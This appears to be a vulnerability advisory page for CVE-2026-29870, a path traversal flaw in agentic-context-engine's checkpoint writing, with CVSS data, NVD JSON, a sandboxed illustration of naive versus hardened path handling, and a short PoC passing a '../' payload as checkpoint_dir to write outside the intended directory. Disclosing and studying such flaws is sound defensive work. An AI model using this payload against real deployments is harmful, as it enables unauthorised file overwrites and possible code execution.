Security Vulnerability Report
CVE-2026-29870 CVSS 7.6 HIGH

CVE-2026-29870

Published: 2026-03-31 15:16:13
Last Modified: 2026-04-01 14:24:03

Description

A directory traversal vulnerability in the agentic-context-engine project versions up to 0.7.1 allows arbitrary file writes via the checkpoint_dir parameter in OfflineACE.run. The save_to_file method in ace/skillbook.py fails to normalize or validate filesystem paths, allowing traversal sequences to escape the intended checkpoint directory. This vulnerability allows attackers to overwrite arbitrary files accessible to the application process, potentially leading to application corruption, privilege escalation, or code execution depending on the deployment context.
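The write pattern the description attributes to save_to_file, shown here as an added illustration that is not code from agentic-context-engine: a hypothetical naive writer that joins a caller-controlled checkpoint_dir onto the checkpoint root and writes without normalising, beside a hardened version that resolves the final path and refuses anything that lands outside the root. The function names, the checkpoint layout and the "../escaped" payload are all assumptions; the demo only ever writes inside a temporary directory it creates itself.

```python
# Added illustration for this advisory, not code from agentic-context-engine.
# Function names, directory layout and payload are assumptions chosen to mirror
# the behaviour the description attributes to ace/skillbook.py save_to_file.
import os
import tempfile
from pathlib import Path

# Constructed sandbox so the demo never touches real files: even the "escaped"
# write lands somewhere under this temporary directory.
SANDBOX = Path(tempfile.mkdtemp(prefix="ace_demo_")).resolve()
CHECKPOINT_ROOT = SANDBOX / "checkpoints"   # writes are supposed to stay here


def save_to_file_naive(checkpoint_dir: str, filename: str, data: str) -> Path:
    """Vulnerable pattern (hypothetical): join and write, no containment check.

    With checkpoint_dir = "../escaped" the file lands in SANDBOX/escaped, outside
    CHECKPOINT_ROOT.  An absolute checkpoint_dir would discard the root entirely,
    because pathlib's "/" operator restarts at an absolute component.
    """
    target = CHECKPOINT_ROOT / checkpoint_dir / filename
    target.parent.mkdir(parents=True, exist_ok=True)
    target.write_text(data)
    return target.resolve()


def is_within(root: Path, candidate: Path) -> bool:
    """True if candidate is root or lies below it.  Both must already be resolved."""
    return os.path.commonpath([str(root), str(candidate)]) == str(root)


def save_to_file_safe(checkpoint_dir: str, filename: str, data: str) -> Path:
    """Hardened form: resolve the final path (symlinks included) and refuse
    anything that does not stay under CHECKPOINT_ROOT."""
    if os.path.basename(filename) != filename or filename in ("", ".", ".."):
        raise ValueError("filename must be a bare file name")
    root = CHECKPOINT_ROOT.resolve()
    target = (root / checkpoint_dir / filename).resolve()
    if not is_within(root, target):
        raise ValueError(f"refusing to write outside {root}: {target}")
    target.parent.mkdir(parents=True, exist_ok=True)
    target.write_text(data)
    return target


def demo() -> dict:
    """Run both variants against a traversal payload and report where each wrote."""
    payload = "../escaped"   # constructed payload; same idea as the PoC's ../ chain
    results = {}
    results["naive"] = str(save_to_file_naive(payload, "malicious.txt", "owned"))
    try:
        save_to_file_safe(payload, "malicious.txt", "owned")
        results["safe"] = "wrote (unexpected)"
    except ValueError as exc:
        results["safe"] = f"rejected: {exc}"
    # A legitimate checkpoint still works with the hardened writer.
    results["safe_ok"] = str(save_to_file_safe("run-1", "skillbook.json", "{}"))
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```

The containment check has to run on the fully resolved path, not on the string: normalising "../" alone misses symlinks planted under the checkpoint root and misses absolute inputs, which pathlib silently lets replace the root. On Python 3.9+ `Path.is_relative_to` can replace the `os.path.commonpath` comparison.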

CVSS Details

CVSS Score
7.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L

Configurations (Affected Products)

No CPE configuration data is available yet; the NVD record is still in "Awaiting Analysis" status. Affected range as stated in the description:

agentic-context-engine <= 0.7.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import os
from ace import OfflineACE

# Vulnerable parameter: checkpoint_dir
# Using path traversal sequences (../) to escape the intended directory
malicious_payload = "../../../../tmp/malicious_file.txt"

# Initialize the engine
# (constructor and run() keyword arguments are as given in the original PoC;
#  check them against the installed version's signatures before use)
engine = OfflineACE()

# Trigger the vulnerability in OfflineACE.run
# The save_to_file method in ace/skillbook.py fails to normalize the path,
# so this writes to /tmp/malicious_file.txt instead of the checkpoint dir
try:
    engine.run(
        data="exploit_content",
        checkpoint_dir=malicious_payload
    )
    print("File written successfully via directory traversal.")
except Exception as e:
    print(f"Error: {e}")

References

https://github.com/lilmingwa13/security-research/blob/main/CVE-2026-29870.md

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-29870",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-31T15:16:12.733",
    "lastModified": "2026-04-01T14:24:02.583",
    "vulnStatus": "Awaiting Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A directory traversal vulnerability in the agentic-context-engine project versions up to 0.7.1 allows arbitrary file writes via the checkpoint_dir parameter in OfflineACE.run. The save_to_file method in ace/skillbook.py fails to normalize or validate filesystem paths, allowing traversal sequences to escape the intended checkpoint directory. This vulnerability allows attackers to overwrite arbitrary files accessible to the application process, potentially leading to application corruption, privilege escalation, or code execution depending on the deployment context."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L",
            "baseScore": 7.6,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "HIGH",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 4.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-22"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/lilmingwa13/security-research/blob/main/CVE-2026-29870.md",
        "source": "[email protected]"
      }
    ]
  }
}